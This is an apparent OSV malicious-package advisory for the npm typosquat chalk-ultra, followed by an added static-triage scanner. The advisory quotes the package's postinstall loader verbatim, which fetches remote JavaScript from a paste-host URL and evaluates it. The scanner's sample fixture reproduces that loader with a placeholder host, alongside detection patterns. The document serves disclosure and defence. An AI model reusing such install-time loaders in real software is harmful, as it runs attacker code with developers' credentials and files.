npm

chalk-ultra @12.0.15

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID

MAL-2026-6300

Ecosystem

npm

Summary

chalk-ultra is published under a name that mimics the widely-used chalk package, but its main is a verbatim copy of nodemailer source and its package.json declares "postinstall": "node lib/utils/index.js". The postinstall path detaches into lib/utils/smtp-connection/index.js, which executes require("axios").get("https://jsonkeeper.com/b/OMNQZ").then(r=>new Function("require",r.data.cookie)(require)). This fetches JavaScript from a public, mutable paste host and evaluates it via new Function with the installer's require and full process privileges at install time. A sibling file, lib/utils/smtp-connection/parse.js, exports an AES-256-CBC decryption helper with a hardcoded key (1c7631ac...0566) and IV (cf17723e...39d6), pre-staged to decode encrypted strings handed back by the remote second-stage payload. Any developer running npm install chalk-ultra executes whatever JavaScript the attacker is currently hosting at the jsonkeeper.com URL, with the installer's network access, environment variables, credentials, and filesystem.

Source: amazon-inspector (9a219b45c3fdcdb883eeb2c7e74d20060af2c788865e7925f911e40276dcd631)
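
The install-time chain described in the summary (lifecycle hook, detached child, fetched JavaScript passed to new Function) can be triaged statically on an unpacked tarball before anything is installed. The following is an added example, not part of the report or of any scanner named on this page; the function name auditPackage, the rule names, and the sample manifest and file contents (including the placeholder URL) are constructed for illustration.

```javascript
// Added example: static triage of an unpacked npm package. File contents are
// passed in as strings and only pattern-matched; nothing here is executed.
const LIFECYCLE = ["preinstall", "install", "postinstall"];
const DYNAMIC_EVAL = /\bnew\s+Function\s*\(|\beval\s*\(/;
const REMOTE_FETCH = /\brequire\(\s*["'](axios|node-fetch|got|https?)["']\s*\)|\bfetch\s*\(/;
const DETACHED_CHILD = /\bdetached\s*:\s*true\b/;

function auditPackage(manifest, files) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE) {
    if (typeof scripts[hook] === "string") {
      findings.push({ rule: "install-hook", where: "package.json", detail: `${hook}: ${scripts[hook]}` });
    }
  }
  for (const [path, src] of Object.entries(files)) {
    // Code built at runtime in the same file that pulls data over the network.
    if (DYNAMIC_EVAL.test(src) && REMOTE_FETCH.test(src)) {
      findings.push({ rule: "remote-code-eval", where: path, detail: "network fetch + dynamic evaluation" });
    }
    // A hook that backgrounds its work outlives the npm install process.
    if (DETACHED_CHILD.test(src)) {
      findings.push({ rule: "detached-child", where: path, detail: "spawns a detached process" });
    }
  }
  const has = (rule) => findings.some((f) => f.rule === rule);
  let verdict = "pass";
  if (has("install-hook") || has("remote-code-eval")) verdict = "review";
  if (has("install-hook") && has("remote-code-eval")) verdict = "block";
  return { verdict, findings };
}

// Constructed sample mirroring the layout in the report; the URL is a placeholder.
const SAMPLE_MANIFEST = { name: "example-pkg", scripts: { postinstall: "node lib/utils/index.js" } };
const SAMPLE_FILES = {
  "lib/utils/index.js":
    'require("child_process").spawn("node", [__dirname + "/smtp-connection/index.js"], { detached: true, stdio: "ignore" }).unref();',
  "lib/utils/smtp-connection/index.js":
    'require("axios").get("https://paste.example/b/PLACEHOLDER").then(r=>new Function("require",r.data.cookie)(require))',
};

const sampleResult = auditPackage(SAMPLE_MANIFEST, SAMPLE_FILES);
console.log(sampleResult.verdict, sampleResult.findings.map((f) => `${f.rule} @ ${f.where}`));
```

Pattern matching of this kind is easily evaded by obfuscation, so a pass only means this specific pattern was not found. Installing with npm's --ignore-scripts flag prevents lifecycle hooks from running at all.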
